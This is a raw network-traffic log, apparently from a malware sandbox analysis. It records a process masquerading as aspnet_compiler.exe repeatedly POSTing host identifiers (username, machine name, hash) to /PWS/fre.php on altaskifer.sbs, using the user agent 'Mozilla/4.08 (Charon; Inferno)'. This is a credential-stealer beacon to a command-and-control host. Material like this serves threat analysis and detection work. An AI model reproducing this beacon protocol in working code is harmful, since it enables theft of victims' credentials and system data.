Apr 6, 2024 09:30:17.235830069 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:17.620068073 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vXjH8gyu5sI8sEgmqqtxSdOWJfNVKN5SYhlpaGnGJt5owLwqNz5ihp8FWgan%2B33%2BL%2FCW5U98lw3wFv2PULXiq8ye%2B58n55475GtLAfKDYhfkNh1ud8GsftXErjjfX1YDlQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012595dc3dafd-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	49789	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:17.895021915 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:18.018956900 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:18.399833918 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jUGBHPQqTTJ%2F0%2F9RMPq8nmRQ77oDv7x9sXz8kqY11%2Ba24Wl96Av9ws2EeE0S7QuRH9ZkPEMTN3xklDRsYHu5mSErNHPJR4SfMN2CcWjocs%2BoOgQpuJZJLU1ObwwqabjETA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700125e3f9b9aef-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.6	49790	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:18.674487114 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:18.799104929 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:19.169862032 CEST	599	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VFb8fynM98Cq7W7RU%2BIXPo0IEcbAlGC94r9I6h3rbRLSf8wzQ%2Fkxy4mUcWDruhpgARf8ZSyXtS5M7WD3drKPK4O8rJMWFnAbJCHW18s8KqbVv0qkugJUqdM4ng2MyvpTNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012631bdc7425-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.6	49791	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:19.440133095 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:19.564436913 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:19.939126968 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nAUuJNb1JeodDMjtSVo4u7eKmWAeb1HUj7%2BkUgG7XYn%2B%2BP2FYKR5p8%2BhXdEYyK9OcgcDcib1%2BYyARgiIVpB4%2Fgev2iO3SEVOtUONG48mFc3uEEBYLR7s2FfxFecvIHcVeg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001267e991336e-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.6	49792	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:20.206304073 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:20.330866098 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:20.703933001 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSvPD8%2FdGTkLhD9RPbD3jeec39d1T0P2lZD5d%2B3UcMKzq4RBUIIl85Nv4zmNTQAVvZwkyuzbOEYy%2F42be5254zU8q2yZUPBb60lgQIVEowK%2FgGgbDpcWo44EJ5J9mA2HHw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700126cbccba581-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.6	49793	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:20.970309973 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:21.094136953 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:21.460465908 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2Fgq58GDnT02%2BRYIilL2ofIB946j8NE2bwPOtKHsWpm4DED9D0%2FOSd%2BnJ8c5zH6kNaIIG89t4TDPwFAjBtGoFjvkNhpaU9Ft7muzm%2BFyEgbgej45DFKVlr8D56FbQ69D6A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012717e446c87-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.6	49794	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:21.735500097 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:21.859711885 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:22.237138033 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xhnZN9ts4RCNj7FgnFLFAj%2BZ8jQAp6CYBYpuvwfx0wWOQxuuLE2BghGlX0pV%2F1zq%2Bt7Gq%2FNYZXYhmGEWDY%2BQRyZdHzq1mzYdBZXsPitKoLHHJ2xcKDo2JrNpdiy1U5TJ1Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012763f793dd3-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.6	49795	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:22.504190922 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:22.627902985 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:23.013819933 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKN68DMbL8v0GuYIwVr7ht7SbUJWsfR5hH8PdegMlpVlFvBP%2Fj8UNcA52vgLHCA7tWacvJIQntAexla%2Bk%2B4CGJ%2FJtNR407z5LbZWUw2XAlwR6gz4A8uJgOFEcC5IzRa2jA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700127b0dd69ab7-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.6	49796	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:23.301208019 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:23.425993919 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:23.815175056 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BEohaYpeqh8p6LNWGQLHpyXchu2yL6syDMtZ2X1ItEn%2FD6mWeWpj%2B3fcRDIz2od%2Fmg5CFsoW2s4Cm73Kvtt91IGlhaJNJ49DuaHXgmdCgxE9ZKGh89NgYjBlNwSf3SeEkg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001280081aa4cd-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.6	49797	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:24.081981897 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:24.206535101 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:24.592781067 CEST	595	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5J4NHIlitFD4ErDgVcliQ77jybBd94uEVoNs7yyPL1hXWQ9sOinvutGqq0EBaInl8yHUXk0TYTr4zNvTcErANmKDWLhqt4RHHmSWLHuUUnXxOOtul6oG5mcPjcPK2TiUCA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001284e9d35c6a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.6	49798	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:24.862545967 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:24.986743927 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:25.372438908 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N66M2Q1wyrm5PMvSMeFtDJKo5xCDv002xcH%2F%2BNgTzM5BFgVVbXzCa6h2FR87vYWJHVa1GbhTEVA%2Bg3WD9blpa9e%2BXRkI1LQzroMMWS1i6J2Zhh%2FlU%2BoTMTfob2E2M5s1Fg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001289ce77a524-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.6	49799	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:25.641171932 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:25.764785051 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:26.148691893 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w5FEmxsuekXb05rYBlCiPDt%2Fl4X1YbrP8et%2FieljZ%2BhNRIN7wQhz0jhRKM77mVnWMTARl01ejwdsmPQ1WEIbvmNCu9ZhopPX25an4ilCuQQR1YkY%2FByaie%2FnkWD0Iq%2FXmg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700128ead2d9ab3-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.6	49800	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:26.424765110 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:26.549029112 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:26.935693026 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQIc0BlZKlqzETXG8y9kkQBUUQ%2FwbAB%2BjjDe%2B08evMZUWKZ9l4%2FGXMyHNLzG4dRQcXs2WsCKeev4RC7M0b7HQctpmWx37bHLFM226oBJ9DKAxNFdDTnOAQ%2FHY5V8P%2Bsknw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001293881bdb25-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.6	49801	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:27.203747034 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:27.327763081 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:27.716696978 CEST	595	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jh2jxEmIRsX6J8aXUF4jae28LXPGGoD2s5NvBoMi2XYNkbUZ8UZdNR7aq95z5QUnZ4cm6NKTzIx31BqNPDoTeaRgWUUib5O7awkX3g0V5ldgXd58fCPpdGFqqAhJEP0pbg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012986e288dba-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.6	49802	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:27.986411095 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:28.110934019 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:28.497347116 CEST	609	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9tiD3FsR974Fv9vT2itZMy2PMP%2FlPcoDr16YuLU5s6Evr201CXBi5b1BVERG1H%2FDrNUFhaB%2Fca%2FCY3WwxeRN2D%2Bd4ksLcGJAZRUGAYgFLKuXBX%2BYk5OWI5tkLmjM%2Fe8QUg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700129d4b5b099e-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.6	49803	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:28.779877901 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
